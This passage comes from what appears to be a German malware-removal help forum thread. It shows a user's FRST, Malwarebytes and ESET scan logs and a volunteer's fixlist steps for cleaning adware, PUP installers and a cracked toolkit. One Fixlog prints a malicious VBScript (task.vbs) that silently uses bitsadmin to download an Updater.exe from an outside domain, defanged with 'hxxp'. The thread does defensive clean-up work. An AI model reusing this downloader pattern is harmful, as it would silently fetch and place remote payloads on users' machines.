C:\ProgramData\RUNDLL32.EXE-3500-F.txt 2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt 2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt 2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt 2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () C:\ProgramData\RUNDLL32.EXE-3548-F.txt 2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt 2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt 2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt 2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt 2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt 2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt 2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt 2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt 2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt 2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt 2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt 2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt 2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt 2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt 2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt 2014-07-30 09:31 - 2014-07-30 09:50 - 0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt 2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt 2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt 2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt 2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt 2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () C:\ProgramData\RUNDLL32.EXE-4212-F.txt 2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt 2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt 2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt 2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt 2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt 2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt 2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt 2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt 2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt 2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt 2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt 2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt 2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt 2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt 2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt 2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () C:\ProgramData\RUNDLL32.EXE-4780-F.txt 2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt 2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt 2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt 2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt 2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () C:\ProgramData\RUNDLL32.EXE-5048-F.txt 2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt 2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt 2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt 2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt 2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt 2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt 2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt Einige Dateien in TEMP: ==================== C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\Windows\system32\winlogon.exe => Datei ist digital signiert C:\Windows\system32\wininit.exe => Datei ist digital signiert C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert C:\Windows\explorer.exe => Datei ist digital signiert C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert C:\Windows\system32\svchost.exe => Datei ist digital signiert C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert C:\Windows\system32\services.exe => Datei ist digital signiert C:\Windows\system32\User32.dll => Datei ist digital signiert C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert C:\Windows\system32\userinit.exe => Datei ist digital signiert C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert C:\Windows\system32\rpcss.dll => Datei ist digital signiert C:\Windows\system32\dnsapi.dll => Datei ist digital signiert C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2015-09-21 19:16 ==================== Ende von FRST.txt ============================ Code:
ATTFilter Malwarebytes Anti-Malware www.malwarebytes.org Suchlaufdatum: 23.09.2015 Suchlaufzeit: 04:58 Protokolldatei: mabam neu.txt Administrator: Ja Version: 2.1.8.1057 Malware-Datenbank: v2015.09.26.02 Rootkit-Datenbank: v2015.09.22.01 Lizenz: Kostenlose Version Malware-Schutz: Deaktiviert Schutz vor bösartigen Websites: Deaktiviert Selbstschutz: Deaktiviert Betriebssystem: Windows 7 CPU: x64 Dateisystem: NTFS Benutzer: Kenny G Suchlauftyp: Bedrohungssuchlauf Ergebnis: Abgeschlossen Durchsuchte Objekte: 515167 Abgelaufene Zeit: 24 Min., 22 Sek. Speicher: Aktiviert Start: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Aktiviert Heuristik: Aktiviert PUP: Aktiviert PUM: Aktiviert Prozesse: 0 (keine bösartigen Elemente erkannt) Module: 0 (keine bösartigen Elemente erkannt) Registrierungsschlüssel: 2 PUP.Optional.VOPackage, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VOPackage, , [89f162d2701b0d29654c8a3f26deec14], PUP.Optional.MyTubeTheater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{C42C5197-0EE9-4940-893B-F4EF047DFF0F}, , [2159da5ac9c25ed8d04b05d3d1334cb4], Registrierungswerte: 0 (keine bösartigen Elemente erkannt) Registrierungsdaten: 0 (keine bösartigen Elemente erkannt) Ordner: 0 (keine bösartigen Elemente erkannt) Dateien: 1 PUP.Optional.Downloader, C:\Users\Kenny G\Desktop\Alles\bewerbung\Desktop Notes - CHIP-Installer.exe, , [6515f3417f0caf87749e063a28d8cd33], Physische Sektoren: 0 (keine bösartigen Elemente erkannt) (end) |
27.09.2015, 04:38 | #9 |
/// Malwareteam | Malware-gen, Adware-gen ...usw Danke für deine Nachricht, also weiter gehts Schritt 1 Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter CloseProcesses: R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X] C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\ HKLM Group Policy restriction on software: C:\Program Files\BitDefender HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe 2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover cmd: type C:\task.vbs 2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak AlternateDataStreams: C:\ProgramData\TEMP:373E1720 Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt 2 Bitte starte wieder FRST und drücke auf Scan Bitte poste in deiner nächsten Antwort also:
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
27.09.2015, 20:12 | #10 |
| Malware-gen, Adware-gen ...usw Danke für die wiederaufnahme Fixlog Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-27 20:46:05) Run:1 Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X] C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\ HKLM Group Policy restriction on software: C:\Program Files\BitDefender HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe 2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover cmd: type C:\task.vbs 2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak AlternateDataStreams: C:\ProgramData\TEMP:373E1720 ***************** Prozess erfolgreich geschlossen. zuroluxy => Dienst erfolgreich entfernt C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579--- => erfolgreich verschoben HKLM Group Policy restriction on software: C:\Program Files\BitDefender => erfolgreich wiederhergestellt "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt "HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe => erfolgreich verschoben C:\Program Files (x86)\Trojan Remover => erfolgreich verschoben ========= type C:\task.vbs ========= Set WshShell = CreateObject("WScript.Shell") cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False) WScript.Sleep 300000 cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False) Set WshShell = Nothing Set WshShell = CreateObject("WScript.Shell") cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False) WScript.Sleep 300000 cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False) Set WshShell = Nothing ========= Ende von CMD: ========= C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- => erfolgreich verschoben C:\Windows\system32\Drivers\etc\hp.bak => erfolgreich verschoben C:\ProgramData\TEMP => ":373E1720" ADS erfolgreich entfernt. Das System musste neu gestartet werden.. ==== Ende von Fixlog 20:46:07 ==== Habe die Datei hochgeladen.Hoffe das ist in Ordnung FRST.txt hxxp://www.file-upload.net/download-10938270/FRST.txt.html |
28.09.2015, 13:42 | #11 |
/// Malwareteam | Malware-gen, Adware-gen ...usw Bitte poste dein Ergebnis nächstes Mal doch zwischen Code-Tags Wenn ein Log zu lange ist, teile ihn bitte auf mehrere Antworten auf. Code-Tags? Drücke einfach die # in Antwortfenster und füge den Log dazwischen ein Schritt 1 ESET Online Scanner
Frage Fallen dir noch irgendwelche Probleme mit deinem Computer auf? Bitte poste in deiner nächsten Antwort also:
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
28.09.2015, 21:53 | #12 |
| Malware-gen, Adware-gen ...usw So Online Scan wird durchgeführt. Leider fällt mir auf das mein Computer sehr langsam geworden ist.Habe ihn auch schon defrag.. und soweit aufgeräumt.Habe fast alle Programme gelöscht die beim Starten geöffnet werden. Ich glaube es sind noch einige Prozesse offen die mir Leistung klauen.Habe ohne etwas geöffnet zu haben nach dem Start 39% auslastung Psysikalischer Speicher.Cpu auslastung ist bei normalem gebrauch auch bei meistens 80-90% So in einigen Minuten gibts den Eset.log Vielen dank für deine bemühungen Code:
ATTFilter ESETSmartInstaller@High as downloader log: all ok # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=init # utc_time=2015-09-28 04:14:01 # local_time=2015-09-28 06:14:01 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 Update Init Update Download Update Finalize Updated modules version: 25979 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=updated # utc_time=2015-09-28 04:34:26 # local_time=2015-09-28 06:34:26 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # OnlineScanner.ocx=1.0.0.7777 # api_version=3.1.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # engine=25979 # end=stopped # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2015-09-28 05:33:39 # local_time=2015-09-28 07:33:39 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.1.7601 NT Service Pack 1 # compatibility_mode_1='AVG Internet Security 2015' # compatibility_mode=1053 16777213 100 100 485436 130595603 0 0 # compatibility_mode_1='' # compatibility_mode=5893 16776574 100 94 476626 195091469 0 0 # scanned=118538 # found=10 # cleaned=0 # scan_time=3553 sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\Uninstall.exe" sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe" sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll" sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll" sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe" sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe" sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe" sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe" sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe" sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe" ESETSmartInstaller@High as downloader log: all ok # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=init # utc_time=2015-09-28 05:34:33 # local_time=2015-09-28 07:34:33 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 Update Init Update Download esets_scanner_update returned -1 esets_gle=53251 Update Finalize Updated modules version: 25979 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # end=updated # utc_time=2015-09-28 05:34:55 # local_time=2015-09-28 07:34:55 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # osver=6.1.7601 NT Service Pack 1 # product=EOS # version=8 # OnlineScannerApp.exe=1.0.0.1 # OnlineScanner.ocx=1.0.0.7777 # api_version=3.1.1 # EOSSerial=d3d2521426185d4e97455a3ab13cddc3 # engine=25979 # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2015-09-28 07:33:21 # local_time=2015-09-28 09:33:21 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.1.7601 NT Service Pack 1 # compatibility_mode_1='AVG Internet Security 2015' # compatibility_mode=1053 16777213 100 100 492618 130602785 0 0 # compatibility_mode_1='' # compatibility_mode=5893 16776574 100 94 483808 195098651 0 0 # scanned=265179 # found=16 # cleaned=0 # scan_time=7105 sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\Uninstall.exe" sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe" sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll" sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll" sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe" sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe" sh=93091732597AD0F0F31341E9832C7458C818C21A ft=1 fh=2ac8f15dc6f2a69a vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\CyberGhost VPN - CHIP-Installer.exe" sh=B68376C1A0CF757B88FFB0334C12284E7976247D ft=1 fh=f6db6822da216b21 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\TeamSpeak 3 32 Bit - CHIP-Installer.exe" sh=B91FA855B8EA4831EBF39C3764FD783349945731 ft=1 fh=c33ed40735587d9b vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Xilisoft iPhone Magic - CHIP-Installer.exe" sh=11C17EF8DBE952B6D870268AD3CA48BAAE140D61 ft=1 fh=403a0c0db8e0bd60 vn="Mehrere Bedrohungen" ac=I fn="C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe" sh=C3937102B74AAE33C7725020F68D998A99CD044B ft=1 fh=6e4c94e4e7dedc70 vn="Win32/Somoto.Q evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\nintendo 64\setup_Project64_2.1-2.exe" sh=3DC4F21FC0E7F3F7D9F790CB87EC114A7C318E02 ft=1 fh=15e73219a331f799 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe" sh=4931F7FA7A81FDEDA2A91C0E65D6C32EC1284F01 ft=1 fh=ad8674ccbb043117 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe" sh=F1E5D784B1071F8D5F1E3EAAFE23A70833C46E6F ft=1 fh=af8d05d80c1de300 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\29AF.tmp.exe" sh=C5B16F532AE1A977A27A8BF74C573823BD510087 ft=1 fh=aff3beb2a54e6882 vn="Variante von Win32/Adware.ConvertAd.WZ.gen Anwendung" ac=I fn="C:\Windows\temp\622C.tmp.exe" sh=42F595E9602BCC78FAB840104B0EC910C4B7B3C9 ft=1 fh=7ae27ef58399bc29 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\Windows\temp\8CA5.tmp.exe" Geändert von Zympop (28.09.2015 um 21:58 Uhr) |
29.09.2015, 09:53 | #13 |
/// Malwareteam | Malware-gen, Adware-gen ...usw =================== Danke für deine Antwort. Dass dein PC momentan langsam ist oder eine hohe Prozessorauslastung hat, bedeutet nicht unbedingt, dass dein PC infiziert ist. Auf Grund der mir zur Verfügung stehenden Informationen und Logs, scheint dein Computer mittlerweile frei von aktiver Malware zu sein. Schritt 1 Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter CloseProcesses: C:\task.vbs C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe EmptyTemp: Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Hinweis: Chip Installer Bitte pass auf, wenn du von Chip oder anderen Portalen Software laden möchtest: Hinweis: Verwendung von Cracks und illegaler Software Du hast Cracks bzw. illegale Software auf deinem Computer verwendet. Lese und bedenke dazu folgenden Artikel: http://www.trojaner-board.de/95394-c...-software.html Schritt 2 Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen Bitte poste in deiner nächsten Antwort also:
__________________ Mfg, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ Unterstütze uns mit einer Spende ......... Lob, Kritik oder Wünsche ......... .......... Folge uns auf Facebook .......... |
29.09.2015, 14:11 | #14 |
| Malware-gen, Adware-gen ...usw Danke für die Antwort Ja mir fällt sonnst auch nichts mehr auf .Jedoch wundere ich mich wieso der Eset online scan 10-16 sachen gefunden hat. Sollen diese nicht bereinigt werden? Das mein Computer so langsam geworden ist liegt wohl warscheinlich wirklich an meiner benutzung. Muss ihn halt einfach noch mehr aufräumen.Dir ist soweit keine unnötigen prozesse aufgefallen? Hier die logs: Fixlist Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-29 09:40:54) Run:2 Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: C:\task.vbs C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe EmptyTemp: ***************** Prozess erfolgreich geschlossen. C:\task.vbs => erfolgreich verschoben C:\Users\Kenny G\Desktop\Neuer Ordner (3)\Microsoft Toolkit.exe => erfolgreich verschoben EmptyTemp: => 968.9 MB temporäre Dateien entfernt. Das System musste neu gestartet werden.. ==== Ende von Fixlog 09:41:36 ==== Code:
